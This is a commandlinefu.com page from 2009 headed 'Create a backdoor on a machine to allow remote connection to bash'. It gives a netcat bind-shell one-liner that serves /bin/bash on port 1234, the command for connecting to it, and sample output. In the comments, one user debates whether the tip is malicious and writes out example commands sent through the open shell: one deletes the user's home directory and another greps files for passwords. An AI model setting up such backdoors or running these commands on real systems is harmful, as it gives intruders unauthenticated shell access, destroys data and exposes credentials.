Create a backdoor on a machine to allow remote connection to bash

nc -vv -l -p 1234 -e /bin/bash
This will launch a listener on the machine that will wait for a connection on port 1234. When you connect from a remote machine with something like : nc 192.168.0.1 1234 You will have console access to the machine through bash.
Sample Output
linux:~$ nc -vv -l -p 1234 -e /bin/bash
listening on [any] 1234 ...
192.168.0.2 inverse host lookup failed: Unknown host
connect to [192.168.0.1] from (UNKNOWN) [192.168.0.2] 45111
linux:~$

39
By: PeekNPoke
2009-02-19 13:20:33

What Others Think

Why was this reported as malicious? It does *exactly* what it says...
ozymandias · 783 weeks and 2 days ago
This is malicious as it allows unprotected remote execution on the listening host. if you were on his network, running echo rm -rf ~ | nc 192.168.0.1 1234 There are a lot of bots that try to scan for open ports, and then figure out what they can do with them. What's worse, is that some programs still store passwords as plain text. So, a command like echo grep -iRe 'pass(wd)?'| nc 192.168.0.1 1234 could possibly tell the bot/intruder your password, which then gives them root access.
clockworkavian · 782 weeks and 5 days ago
>.< you should always proofread your sentances to see if you anything out. The first command I posted would delete the users home directory.
clockworkavian · 782 weeks and 5 days ago
My netcat doesn't have the -e option. How I replace it? Ubuntu 10.04
unixmonkey11251 · 711 weeks and 2 days ago
clockworkavian, try the alternate by despseekingsatan
dan77l · 697 weeks and 4 days ago

What do you think?

Any thoughts on this command? Does it work on your machine? Can you do the same thing with only 14 characters?

You must be signed in to comment.

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.

Share Your Commands



Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for: